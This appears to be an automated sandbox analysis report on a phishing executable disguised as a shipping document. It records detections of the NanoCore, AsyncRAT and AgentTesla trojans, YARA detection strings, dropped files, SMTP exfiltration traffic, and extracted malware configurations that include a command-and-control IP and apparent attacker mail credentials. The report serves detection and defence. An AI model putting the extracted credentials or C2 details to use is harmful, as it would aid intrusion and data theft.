3.2.Icda.exe.a40000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
5.0.Fdquqwatjjr.exe.4e0000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.2.Icda.exe.5970000.5.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xf7ad:$x1: NanoCore.ClientPluginHost 0xf7da:$x2: IClientNetworkHost
3.2.Icda.exe.5970000.5.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xf7ad:$x2: NanoCore.ClientPluginHost 0x10888:$s4: PipeCreated 0xf7c7:$s5: IClientLoggingHost
3.2.Icda.exe.5970000.5.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.0.VLC2.exe.a0000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
5.2.Fdquqwatjjr.exe.4e0000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
3.0.Icda.exe.a40000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
3.0.Icda.exe.a40000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
3.0.Icda.exe.a40000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
3.0.Icda.exe.a40000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
3.2.Icda.exe.5970000.5.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xd9ad:$x1: NanoCore.ClientPluginHost 0xd9da:$x2: IClientNetworkHost
3.2.Icda.exe.5970000.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xd9ad:$x2: NanoCore.ClientPluginHost 0xea88:$s4: PipeCreated 0xd9c7:$s5: IClientLoggingHost
3.2.Icda.exe.5970000.5.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
16.2.VLC2.exe.a0000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
14.2.VLC2.exe.900000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.0.Isgeprf.exe.710000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
4.2.Isgeprf.exe.710000.0.unpack	JoeSecurity_AsyncRAT	Yara detected AsyncRAT	Joe Security
17.2.dhcpmon.exe.c80000.0.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
17.2.dhcpmon.exe.c80000.0.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xff05:$x1: NanoCore Client.exe 0x1018d:$x2: NanoCore.ClientPluginHost 0x117c6:$s1: PluginCommand 0x117ba:$s2: FileCommand 0x1266b:$s3: PipeExists 0x18422:$s4: PipeCreated 0x101b7:$s5: IClientLoggingHost
17.2.dhcpmon.exe.c80000.0.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
17.2.dhcpmon.exe.c80000.0.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x1007b:$c: ProjectData 0x10a82:$d: DESCrypto 0x1844e:$e: KeepAlive 0x1643c:$g: LogClientMessage 0x12637:$i: get_Connected 0x10db8:$j: #=q 0x10de8:$j: #=q 0x10e04:$j: #=q 0x10e34:$j: #=q 0x10e50:$j: #=q 0x10e6c:$j: #=q 0x10e9c:$j: #=q 0x10eb8:$j: #=q
Click to see the 27 entries

Sigma Overview

System Summary:

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\Icda.exe, ProcessId: 6888, TargetFilename: C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Avira: detection malicious, Label: TR/Dropper.Gen
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Avira: detection malicious, Label: TR/Spy.Gen8
Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe	Avira: detection malicious, Label: HEUR/AGEN.1101060
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Avira: detection malicious, Label: TR/Dropper.MSIL.Gen7

Found malware configuration

Show sources

Source: Icda.exe.6888.3.memstr	Malware Configuration Extractor: NanoCore {"C2: ": ["172.94.25.202"], "Version: ": "NanoCore Client, Version=1.2.2.0"}
Source: Fdquqwatjjr.exe.7032.5.memstr	Malware Configuration Extractor: Agenttesla {"Username: ": "gfumyAo", "URL: ": "https://dh2LZPEqfQO.net", "To: ": "mebarth@flood-protection.org", "ByHost: ": "mail.flood-protection.org:587", "Password: ": "932mpxGhMO2", "From: ": "sent@flood-protection.org"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	ReversingLabs: Detection: 93%
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	ReversingLabs: Detection: 66%
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	ReversingLabs: Detection: 93%
Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	ReversingLabs: Detection: 86%

Multi AV Scanner detection for submitted file

Show sources

Source: Consignment Document PL&BL Draft.exe

Virustotal: Detection: 21%

Perma Link

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6608, type: MEMORY
Source: Yara match	File source: Process Memory Space: Icda.exe PID: 6888, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
Source: Yara match	File source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Icda.exe.5970000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Icda.exe.5970000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Icda.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\VLC2.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Fdquqwatjjr.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\Rczgwoxvqzh.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: Consignment Document PL&BL Draft.exe

Joe Sandbox ML: detected

Source: 17.0.dhcpmon.exe.c80000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 14.0.VLC2.exe.900000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 3.2.Icda.exe.a40000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 16.0.VLC2.exe.a0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 3.0.Icda.exe.a40000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 3.2.Icda.exe.5970000.5.unpack	Avira: Label: TR/NanoCore.fadte
Source: 14.2.VLC2.exe.900000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 16.2.VLC2.exe.a0000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 4.0.Isgeprf.exe.710000.0.unpack	Avira: Label: TR/Dropper.Gen
Source: 17.2.dhcpmon.exe.c80000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen7
Source: 4.2.Isgeprf.exe.710000.0.unpack	Avira: Label: TR/Dropper.Gen

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic

Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49739 -> 85.187.154.178:587

Source: global traffic

TCP traffic: 192.168.2.3:49739 -> 85.187.154.178:587

Source: Joe Sandbox View

IP Address: 85.187.154.178 85.187.154.178

Source: Joe Sandbox View

ASN Name: A2HOSTINGUS A2HOSTINGUS

Source: global traffic

TCP traffic: 192.168.2.3:49739 -> 85.187.154.178:587

Source: unknown

DNS traffic detected: queries for: centurygift.myq-see.com

Source: Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: http://EAXDhR.com
Source: Fdquqwatjjr.exe, 00000005.00000002.492360953.0000000002C08000.00000004.00000001.sdmp	String found in binary or memory: http://flood-protection.org
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Fdquqwatjjr.exe, 00000005.00000002.492360953.0000000002C08000.00000004.00000001.sdmp	String found in binary or memory: http://mail.flood-protection.org
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.234335225.0000000003011000.00000004.00000001.sdmp, Isgeprf.exe, 00000004.00000002.263961602.0000000002B9E000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Consignment Document PL&BL Draft.exe, 00000000.00000002.242238829.00000000071D2000.00000004.00000001.sdmp, Consignment Document PL&BL Draft.exe, 00000001.00000002.254479506.00000000062C0000.00000002.00000001.sdmp, Rczgwoxvqzh.exe, 00000002.00000002.253621954.000000001BBD0000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.orgGETMozilla/5.0
Source: Rczgwoxvqzh.exe, 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000000.243567239.00000000004E2000.00000002.00020000.sdmp, Fdquqwatjjr.exe.2.dr	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
Source: Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp, Fdquqwatjjr.exe, 00000005.00000002.492360953.0000000002C08000.00000004.00000001.sdmp	String found in binary or memory: https://dh2LZPEqfQO.net
Source: Rczgwoxvqzh.exe, 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, Fdquqwatjjr.exe, Fdquqwatjjr.exe.2.dr	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: Fdquqwatjjr.exe, 00000005.00000002.489191413.00000000028C1000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT

Show sources

Source: Yara match	File source: 00000004.00000000.242716308.0000000000712000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.483926024.0000000000902000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.245249289.0000000002E91000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.263991887.0000000002BB2000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000000.271847625.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.283204276.00000000000A2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000000.266244520.0000000000902000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.263102745.0000000000712000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Isgeprf.exe PID: 6976, type: MEMORY
Source: Yara match	File source: Process Memory Space: Rczgwoxvqzh.exe PID: 6872, type: MEMORY
Source: Yara match	File source: Process Memory Space: VLC2.exe PID: 6228, type: MEMORY
Source: Yara match	File source: Process Memory Space: VLC2.exe PID: 6008, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\VLC2.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Isgeprf.exe, type: DROPPED
Source: Yara match	File source: 14.0.VLC2.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.0.VLC2.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.VLC2.exe.a0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.VLC2.exe.900000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.Isgeprf.exe.710000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.Isgeprf.exe.710000.0.unpack, type: UNPACKEDPE

Source: Icda.exe, 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp

Binary or memory string: RegisterRawInputDevices

E-Banking Fraud:

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.483884950.0000000000A42000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: dhcpmon.exe PID: 6608, type: MEMORY
Source: Yara match	File source: Process Memory Space: Icda.exe PID: 6888, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\Icda.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe, type: DROPPED
Source: Yara match	File source: 17.0.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Icda.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Icda.exe.5970000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.Icda.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.Icda.exe.5970000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.dhcpmon.exe.c80000.0.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000003.00000002.492629287.0000000004167000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000011.00000002.288342555.0000000000C82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000002.292802539.0000000003331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000003.00000002.494089209.0000000005970000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000003.00000000.239526558.0000000000A42000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000002.292878095.0000000004331000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000011.00000000.272991155.0000000000C82000.00000002.00020000.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000001.00000002.244055752.00000000041A9000.00000004.00000001.sdmp, type: MEMORY	Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
